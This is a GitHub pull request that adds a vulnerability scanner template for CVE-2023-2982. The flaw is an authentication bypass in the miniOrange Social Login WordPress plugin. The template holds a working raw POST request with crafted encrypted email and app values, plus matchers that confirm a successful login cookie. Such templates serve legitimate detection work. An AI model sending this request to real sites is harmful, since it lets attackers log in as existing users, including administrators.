Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-2982.yaml #7576

Merged
merged 1 commit into from
Jul 10, 2023
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
41 changes: 41 additions & 0 deletions http/cves/2023/CVE-2023-2982.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
id: CVE-2023-2982

info:
name: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass
author: ritikchaddha
severity: critical
description: |
The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
remediation: Fixed in version 7.6.5
reference: |
- https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/
- https://wordpress.org/plugins/miniorange-login-openid/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2982
classification:
cve-id: CVE-2023-2982
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange

http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D

matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "wordpress_sec_"
- "wordpress_logged_in_"
condition: or

- type: status
status:
- 302
Loading